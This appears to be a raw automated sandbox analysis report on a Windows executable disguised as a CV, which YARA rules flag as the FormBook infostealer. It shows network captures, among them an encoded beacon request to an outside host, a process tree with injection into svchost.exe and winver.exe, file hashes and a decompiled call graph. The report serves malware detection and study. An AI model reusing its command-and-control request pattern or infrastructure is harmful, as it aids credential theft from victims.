                                                                                      Data Raw: 64 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 4d e2 f4 53 1e 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ca ee 50 34 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d a7 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a bb a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca 7b 97 7e 69 9c c3 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 df 73 d7 11 93 30 88 64 a9 eb c4 e9 c9 61 ab 27 76 1d 5b 18 ea 4b c3 f1 1d e9 70 d7 88 6d ee 8a d6 3a 44 48 47 ba a2 3d 99 4c cc 78 e4 f2 9e e1 7c 68 06 be eb f8 a2 69 e9 47 4d 7c 19 b1 48 b8 ad 4a 2c a7 ae 88 87 42 60 16 4f f4 1c de aa 70 d7 ad b0 61 24 fa 85 ae 4a 37 83 8f 65 60 da 71 8c 19 66 e3 1d ac 22 ef dd e7 50 2b f0 4d fc d9 5c af 30 32 1f ac e5 f1 81 b0 ae 18 aa 63 bb 19 db 91 13 ca b6 75 a6 79 7a fb 8d 8b [TRUNCATED]
                                                                                      Data Ascii: d1bZko_1fQRERMS(.P4mHI#F}CvQ].)R~)*@9;s{gf{-`C&eUqP:\Zh\A{'$gG{~i3sO*!F?0;)hlD9s0da'v[Kpm:DHG=Lx|hiGM|HJ,B`Opa$J7e`qf"P+M\02cuyz]zmuj`b-X-mXM+cX*}/bi^(`GvRNr3E"S8t4\Aok:NV`;:3Jd,Gut$rEK svW5@JR\D7Q(9Hd?%|>Qr7wnn4:l6P0`Y=A(|@-"y4t#(WL?Jo6-nZXGt@7&CQA,VvRnYlmdgX6fzhOh#RUnN9sUwR~.a@?|QG9Y6!-{;WE|_/F.y/u\"50pbk{Z4n`H'-ZoHKaSV_w)O^N/S{2%uks,\ecJ0c/W|l,;L~Q'3;`&GgMIt)KF*)RjC' "1yhW)"*B<(/&UaZ3;8 ,""6b [TRUNCATED]
                                                                                      Nov 24, 2024 08:13:03.996937037 CET1236INData Raw: 36 eb cc fd 25 76 75 0d 0f d1 ec f8 1d 57 f4 a5 a1 23 1b 13 ca 28 f0 07 4f 76 0a a8 18 70 b7 29 93 fd 13 e8 45 da 82 79 1f 27 f7 80 33 25 61 8e 65 17 63 57 1b 27 1e 77 b5 cb 0b 4d ba 01 f8 ce 43 a2 f4 05 e4 fe 19 e9 ef 7e fa 7b 84 c8 e3 f4 cb e4
                                                                                      Data Ascii: 6%vuW#(Ovp)Ey'3%aecW'wMC~{{VPK'i>3<5.;Hox:s+p|@XazP6Io^`,dPH?|XXC5d__z3LtCKx120x`j?sB~$!EU7Y
                                                                                      Nov 24, 2024 08:13:03.996944904 CET1069INData Raw: b6 7b 2d 5d 82 3c e5 35 c2 d2 81 a5 e3 fa 65 cf 4f 3a b2 cf ae 3d f2 4b 11 28 de e3 92 d7 e8 4f fd da 29 56 fa 71 fa ac c6 a8 dd 54 37 1d 38 e5 c4 b9 64 9d cd 77 a2 fe 91 c0 06 df df 98 1b bc 77 6a ee eb 4c 16 4e 49 3b 4e 6f a9 9c 5d 1e 31 3a 5b
                                                                                      Data Ascii: {-]<5eO:=K(O)VqT78dwwjLNI;No]1:[qi#l[k[cU^eH~A_`KLW9DJA56tue)wfTmN?bYV]1bq!,Z*}s9ghO)2rz*;w|{sK/}$dRrxH


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      48192.168.2.450050194.58.112.174804544C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 24, 2024 08:13:05.331769943 CET463OUTGET /gdvz/?3vNdCBvX=42oDQZKHBS2RpvFPN57q1Tvu2doBJ10tXRowK0Gqt433jWsXILGJddh+nwwRXUDcpHF9qTVEG6VDXm2WV9OicxtKtIH3MbSxhASop5ADKNulvt1+Wm0v0/w=&etx=BXy4elO0X HTTP/1.1
                                                                                      Host: www.sklad-iq.online
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                      Nov 24, 2024 08:13:06.695780993 CET1236INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Sun, 24 Nov 2024 07:13:06 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Data Raw: 32 34 66 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 6b 6c 61 64 2d 69 71 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d [TRUNCATED]
                                                                                      Data Ascii: 24f3<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.sklad-iq.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.r [TRUNCATED]
                                                                                      Nov 24, 2024 08:13:06.695863008 CET224INData Raw: 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f
                                                                                      Data Ascii: ><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.sklad-iq.online</h1><p cla
                                                                                      Nov 24, 2024 08:13:06.695931911 CET1236INData Raw: 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b8 d1 80 d0 be d0 b2 d0 b0 d0
                                                                                      Data Ascii: ss="b-parking__header-description b-text"> <br>&nbsp; &nbsp;.</p><div class="b-parking__buttons-wrapper"><a class="b-button b-button_color_reference b-button_size_norm
                                                                                      Nov 24, 2024 08:13:06.696033001 CET1236INData Raw: 70 72 6f 6d 6f 2d 69 6d 61 67 65 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 3e 3c 2f 73 70 61 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72 67 69 6e 5f 6c 65 66 74 2d 6c 61 72 67 65 22 3e 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 62
                                                                                      Data Ascii: promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></strong><p class="b-text b-parking__promo-subtitle l-margin_bottom-none"> &nbsp;
                                                                                      Nov 24, 2024 08:13:06.696046114 CET448INData Raw: 3a 2f 2f 77 77 77 2e 72 65 67 2e 72 75 2f 68 6f 73 74 69 6e 67 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 73 6b 6c 61 64 2d 69 71 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61
                                                                                      Data Ascii: ://www.reg.ru/hosting/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </a><p class="b-price b-parking__price"> <b class="b-price__amount">83&nbsp;<span c
                                                                                      Nov 24, 2024 08:13:06.696158886 CET1236INData Raw: 62 2d 74 69 74 6c 65 20 62 2d 74 69 74 6c 65 5f 73 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 22 3e d0 92 d0 b8 d1 80 d1 82 d1 83 d0 b0 d0 bb d1 8c d0 bd d1 8b d0 b9 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 2c 20 56 50 53 20 d0 b8 26
                                                                                      Data Ascii: b-title b-title_size_large-compact"> , VPS &nbsp;Dedicated</strong><p class="b-text b-parking__promo-description"> &nbsp;
                                                                                      Nov 24, 2024 08:13:06.696229935 CET1236INData Raw: 63 74 69 6f 6e 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 6d 61 67 65 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 6d 61 67 65 5f 74 79 70 65 5f 73 73 6c 20 6c 2d 6d 61 72 67 69
                                                                                      Data Ascii: ction"><span class="b-parking__promo-image b-parking__promo-image_type_ssl l-margin_right-large"></span> <strong class="b-title b-title_size_large-compact b-title_margin_none">SSL- &nbsp;6
                                                                                      Nov 24, 2024 08:13:06.696240902 CET1236INData Raw: 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 6a 73 22
                                                                                      Data Ascii: ror="window.trackScriptLoad('parking-rdap-auto.js', 1)" src="parking-rdap-auto.js" charset="utf-8"></script><script>function ondata(data){ if ( data.error_code ) { return; } if ( data.ref_id
                                                                                      Nov 24, 2024 08:13:06.696250916 CET1236INData Raw: 20 20 20 74 20 3d 20 27 74 65 78 74 43 6f 6e 74 65 6e 74 27 20 69 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 20 3f 20 27 74 65 78 74 43 6f 6e 74 65 6e 74 27 20 3a 20 27 69 6e 6e 65 72 54 65 78 74 27 3b 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20
                                                                                      Data Ascii: t = 'textContent' in document.body ? 'textContent' : 'innerText'; var domainName = document.title.match( /(xn--|[0-9]).+\.(xn--)[^\s]+/ )[0]; if ( domainName ) { var domainNameUnicode = punycode.ToUnicode( doma
                                                                                      Nov 24, 2024 08:13:06.696343899 CET298INData Raw: 20 20 20 20 20 20 20 63 6c 69 63 6b 6d 61 70 3a 74 72 75 65 2c 0a 20 20 20 20 20 20 20 20 74 72 61 63 6b 4c 69 6e 6b 73 3a 74 72 75 65 2c 0a 20 20 20 20 20 20 20 20 61 63 63 75 72 61 74 65 54 72 61 63 6b 42 6f 75 6e 63 65 3a 74 72 75 65 2c 0a 20
                                                                                      Data Ascii: clickmap:true, trackLinks:true, accurateTrackBounce:true, webvisor:true });</script><noscript><div><img src="https://mc.yandex.ru/watch/98466329" style="position:absolute; left:-9999px;" alt=""></div></noscrip


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:02:08:59
                                                                                      Start date:24/11/2024
                                                                                      Path:C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"
                                                                                      Imagebase:0x380000
                                                                                      File size:1'207'808 bytes
                                                                                      MD5 hash:DFFCFC55DBE3596498888C48F569ADCD
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:1
                                                                                      Start time:02:09:01
                                                                                      Start date:24/11/2024
                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"
                                                                                      Imagebase:0xcf0000
                                                                                      File size:46'504 bytes
                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2031660118.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2036469634.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2031290785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:5
                                                                                      Start time:02:09:27
                                                                                      Start date:24/11/2024
                                                                                      Path:C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe"
                                                                                      Imagebase:0xe60000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4145164327.00000000028E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:6
                                                                                      Start time:02:09:30
                                                                                      Start date:24/11/2024
                                                                                      Path:C:\Windows\SysWOW64\winver.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWOW64\winver.exe"
                                                                                      Imagebase:0x30000
                                                                                      File size:57'344 bytes
                                                                                      MD5 hash:B5471B0FB5402FC318C82C994C6BF84D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4145192791.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4145128691.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4143976665.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      Target ID:7
                                                                                      Start time:02:09:42
                                                                                      Start date:24/11/2024
                                                                                      Path:C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe"
                                                                                      Imagebase:0xe60000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:8
                                                                                      Start time:02:09:55
                                                                                      Start date:24/11/2024
                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                      Imagebase:0x800000
                                                                                      File size:676'768 bytes
                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:4%
                                                                                        Dynamic/Decrypted Code Coverage:1.5%
                                                                                        Signature Coverage:11.2%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:149
                                                                                        execution_graph 92346 3f19dd 92351 384a30 92346->92351 92348 3f19f1 92371 3a0f0a 52 API calls __cinit 92348->92371 92350 3f19fb 92352 384a40 __ftell_nolock 92351->92352 92372 38d7f7 92352->92372 92356 384aff 92384 38363c 92356->92384 92363 38d7f7 48 API calls 92364 384b32 92363->92364 92406 3849fb 92364->92406 92366 3861a6 48 API calls 92368 384b3d _wcscat Mailbox __NMSG_WRITE 92366->92368 92367 384b43 Mailbox 92367->92348 92368->92366 92368->92367 92370 3864cf 48 API calls 92368->92370 92420 38ce19 92368->92420 92370->92368 92371->92350 92426 39f4ea 92372->92426 92374 38d818 92375 39f4ea 48 API calls 92374->92375 92376 384af6 92375->92376 92377 385374 92376->92377 92457 3af8a0 92377->92457 92380 38ce19 48 API calls 92381 3853a7 92380->92381 92459 38660f 92381->92459 92383 3853b1 Mailbox 92383->92356 92385 383649 __ftell_nolock 92384->92385 92506 38366c GetFullPathNameW 92385->92506 92387 38365a 92388 386a63 48 API calls 92387->92388 92389 383669 92388->92389 92390 38518c 92389->92390 92391 385197 92390->92391 92392 3f1ace 92391->92392 92393 38519f 92391->92393 92395 386b4a 48 API calls 92392->92395 92508 385130 92393->92508 92397 3f1adb __NMSG_WRITE 92395->92397 92396 384b18 92400 3864cf 92396->92400 92398 39ee75 48 API calls 92397->92398 92399 3f1b07 _memcpy_s 92398->92399 92402 38651b 92400->92402 92405 3864dd _memcpy_s 92400->92405 92401 39f4ea 48 API calls 92403 384b29 92401->92403 92404 39f4ea 48 API calls 92402->92404 92403->92363 92404->92405 92405->92401 92523 38bcce 92406->92523 92409 3f41cc RegQueryValueExW 92411 3f4246 RegCloseKey 92409->92411 92412 3f41e5 92409->92412 92410 384a2b 92410->92368 92413 39f4ea 48 API calls 92412->92413 92414 3f41fe 92413->92414 92529 3847b7 92414->92529 92417 3f4224 92418 386a63 48 API calls 92417->92418 92419 3f423b 92418->92419 92419->92411 92421 38ce28 __NMSG_WRITE 92420->92421 92422 39ee75 48 API calls 92421->92422 92423 38ce50 _memcpy_s 92422->92423 92424 39f4ea 48 API calls 92423->92424 92425 38ce66 92424->92425 92425->92368 92429 39f4f2 __calloc_impl 92426->92429 92428 39f50c 92428->92374 92429->92428 92430 39f50e std::exception::exception 92429->92430 92435 3a395c 92429->92435 92449 3a6805 RaiseException 92430->92449 92432 39f538 92450 3a673b 47 API calls _free 92432->92450 92434 39f54a 92434->92374 92436 3a39d7 __calloc_impl 92435->92436 92440 3a3968 __calloc_impl 92435->92440 92456 3a7c0e 47 API calls __getptd_noexit 92436->92456 92439 3a399b RtlAllocateHeap 92439->92440 92448 3a39cf 92439->92448 92440->92439 92442 3a39c3 92440->92442 92443 3a3973 92440->92443 92446 3a39c1 92440->92446 92454 3a7c0e 47 API calls __getptd_noexit 92442->92454 92443->92440 92451 3a81c2 47 API calls __NMSG_WRITE 92443->92451 92452 3a821f 47 API calls 5 library calls 92443->92452 92453 3a1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 92443->92453 92455 3a7c0e 47 API calls __getptd_noexit 92446->92455 92448->92429 92449->92432 92450->92434 92451->92443 92452->92443 92454->92446 92455->92448 92456->92448 92458 385381 GetModuleFileNameW 92457->92458 92458->92380 92460 3af8a0 __ftell_nolock 92459->92460 92461 38661c GetFullPathNameW 92460->92461 92466 386a63 92461->92466 92463 386643 92477 386571 92463->92477 92467 386adf 92466->92467 92469 386a6f __NMSG_WRITE 92466->92469 92494 38b18b 92467->92494 92470 386a8b 92469->92470 92471 386ad7 92469->92471 92481 386b4a 92470->92481 92493 38c369 48 API calls 92471->92493 92474 386a95 92484 39ee75 92474->92484 92476 386ab6 _memcpy_s 92476->92463 92478 38657f 92477->92478 92479 38b18b 48 API calls 92478->92479 92480 38658f 92479->92480 92480->92383 92482 39f4ea 48 API calls 92481->92482 92483 386b54 92482->92483 92483->92474 92486 39f4ea __calloc_impl 92484->92486 92485 3a395c __crtLCMapStringA_stat 47 API calls 92485->92486 92486->92485 92487 39f50c 92486->92487 92488 39f50e std::exception::exception 92486->92488 92487->92476 92498 3a6805 RaiseException 92488->92498 92490 39f538 92499 3a673b 47 API calls _free 92490->92499 92492 39f54a 92492->92476 92493->92476 92495 38b1a2 _memcpy_s 92494->92495 92496 38b199 92494->92496 92495->92476 92496->92495 92500 38bdfa 92496->92500 92498->92490 92499->92492 92501 38be0d 92500->92501 92505 38be0a _memcpy_s 92500->92505 92502 39f4ea 48 API calls 92501->92502 92503 38be17 92502->92503 92504 39ee75 48 API calls 92503->92504 92504->92505 92505->92495 92507 38368a 92506->92507 92507->92387 92509 38513f __NMSG_WRITE 92508->92509 92510 3f1b27 92509->92510 92511 385151 92509->92511 92512 386b4a 48 API calls 92510->92512 92518 38bb85 92511->92518 92514 3f1b34 92512->92514 92516 39ee75 48 API calls 92514->92516 92515 38515e _memcpy_s 92515->92396 92517 3f1b57 _memcpy_s 92516->92517 92519 38bb9b 92518->92519 92522 38bb96 _memcpy_s 92518->92522 92520 39ee75 48 API calls 92519->92520 92521 3f1b77 92519->92521 92520->92522 92522->92515 92524 38bce8 92523->92524 92525 384a0a RegOpenKeyExW 92523->92525 92526 39f4ea 48 API calls 92524->92526 92525->92409 92525->92410 92527 38bcf2 92526->92527 92528 39ee75 48 API calls 92527->92528 92528->92525 92530 39f4ea 48 API calls 92529->92530 92531 3847c9 RegQueryValueExW 92530->92531 92531->92417 92531->92419 92532 3f197b 92537 39dd94 92532->92537 92536 3f198a 92538 39f4ea 48 API calls 92537->92538 92539 39dd9c 92538->92539 92540 39ddb0 92539->92540 92545 39df3d 92539->92545 92544 3a0f0a 52 API calls __cinit 92540->92544 92544->92536 92546 39dda8 92545->92546 92547 39df46 92545->92547 92549 39ddc0 92546->92549 92577 3a0f0a 52 API calls __cinit 92547->92577 92550 38d7f7 48 API calls 92549->92550 92551 39ddd7 GetVersionExW 92550->92551 92552 386a63 48 API calls 92551->92552 92553 39de1a 92552->92553 92578 39dfb4 92553->92578 92556 386571 48 API calls 92559 39de2e 92556->92559 92558 3f24c8 92559->92558 92582 39df77 92559->92582 92561 39dea4 GetCurrentProcess 92591 39df5f LoadLibraryA GetProcAddress 92561->92591 92562 39debb 92563 39df31 GetSystemInfo 92562->92563 92564 39dee3 92562->92564 92567 39df0e 92563->92567 92585 39e00c 92564->92585 92569 39df1c FreeLibrary 92567->92569 92570 39df21 92567->92570 92569->92570 92570->92540 92571 39df29 GetSystemInfo 92574 39df03 92571->92574 92572 39def9 92588 39dff4 92572->92588 92574->92567 92576 39df09 FreeLibrary 92574->92576 92576->92567 92577->92546 92579 39dfbd 92578->92579 92580 38b18b 48 API calls 92579->92580 92581 39de22 92580->92581 92581->92556 92592 39df89 92582->92592 92596 39e01e 92585->92596 92589 39e00c 2 API calls 92588->92589 92590 39df01 GetNativeSystemInfo 92589->92590 92590->92574 92591->92562 92593 39dea0 92592->92593 92594 39df92 LoadLibraryA 92592->92594 92593->92561 92593->92562 92594->92593 92595 39dfa3 GetProcAddress 92594->92595 92595->92593 92597 39def1 92596->92597 92598 39e027 LoadLibraryA 92596->92598 92597->92571 92597->92572 92598->92597 92599 39e038 GetProcAddress 92598->92599 92599->92597 92600 3f19ba 92605 39c75a 92600->92605 92604 3f19c9 92606 38d7f7 48 API calls 92605->92606 92607 39c7c8 92606->92607 92613 39d26c 92607->92613 92609 39c865 92610 39c881 92609->92610 92616 39d1fa 48 API calls _memcpy_s 92609->92616 92612 3a0f0a 52 API calls __cinit 92610->92612 92612->92604 92617 39d298 92613->92617 92616->92609 92618 39d28b 92617->92618 92619 39d2a5 92617->92619 92618->92609 92619->92618 92620 39d2ac RegOpenKeyExW 92619->92620 92620->92618 92621 39d2c6 RegQueryValueExW 92620->92621 92622 39d2fc RegCloseKey 92621->92622 92623 39d2e7 92621->92623 92622->92618 92623->92622 92624 3f8eb8 92628 3ca635 92624->92628 92626 3f8ec3 92627 3ca635 84 API calls 92626->92627 92627->92626 92634 3ca66f 92628->92634 92636 3ca642 92628->92636 92629 3ca671 92669 39ec4e 81 API calls 92629->92669 92630 3ca676 92639 38936c 92630->92639 92633 3ca67d 92659 38510d 92633->92659 92634->92626 92636->92629 92636->92630 92636->92634 92637 3ca669 92636->92637 92668 394525 61 API calls _memcpy_s 92637->92668 92640 389384 92639->92640 92657 389380 92639->92657 92641 3f4cbd __i64tow 92640->92641 92642 3f4bbf 92640->92642 92643 389398 92640->92643 92644 3893b0 __itow Mailbox _wcscpy 92640->92644 92645 3f4bc8 92642->92645 92646 3f4ca5 92642->92646 92670 3a172b 80 API calls 3 library calls 92643->92670 92649 39f4ea 48 API calls 92644->92649 92645->92644 92650 3f4be7 92645->92650 92671 3a172b 80 API calls 3 library calls 92646->92671 92651 3893ba 92649->92651 92652 39f4ea 48 API calls 92650->92652 92653 38ce19 48 API calls 92651->92653 92651->92657 92654 3f4c04 92652->92654 92653->92657 92655 39f4ea 48 API calls 92654->92655 92656 3f4c2a 92655->92656 92656->92657 92658 38ce19 48 API calls 92656->92658 92657->92633 92658->92657 92660 38511f 92659->92660 92661 3f1be7 92659->92661 92672 38b384 92660->92672 92681 3ba58f 48 API calls _memcpy_s 92661->92681 92664 38512b 92664->92634 92665 3f1bf1 92682 386eed 92665->92682 92667 3f1bf9 Mailbox 92668->92634 92669->92630 92670->92644 92671->92644 92673 38b392 92672->92673 92680 38b3c5 _memcpy_s 92672->92680 92674 38b3b8 92673->92674 92675 38b3fd 92673->92675 92673->92680 92677 38bb85 48 API calls 92674->92677 92676 39f4ea 48 API calls 92675->92676 92678 38b407 92676->92678 92677->92680 92679 39f4ea 48 API calls 92678->92679 92679->92680 92680->92664 92681->92665 92683 386ef8 92682->92683 92684 386f00 92682->92684 92686 38dd47 48 API calls _memcpy_s 92683->92686 92684->92667 92686->92684 92687 3a5dfd 92688 3a5e09 ___lock_fhandle 92687->92688 92724 3a7eeb GetStartupInfoW 92688->92724 92690 3a5e0e 92726 3a9ca7 GetProcessHeap 92690->92726 92692 3a5e66 92693 3a5e71 92692->92693 92811 3a5f4d 47 API calls 3 library calls 92692->92811 92727 3a7b47 92693->92727 92696 3a5e77 92697 3a5e82 __RTC_Initialize 92696->92697 92812 3a5f4d 47 API calls 3 library calls 92696->92812 92748 3aacb3 92697->92748 92700 3a5e91 92701 3a5e9d GetCommandLineW 92700->92701 92813 3a5f4d 47 API calls 3 library calls 92700->92813 92767 3b2e7d GetEnvironmentStringsW 92701->92767 92704 3a5e9c 92704->92701 92708 3a5ec2 92780 3b2cb4 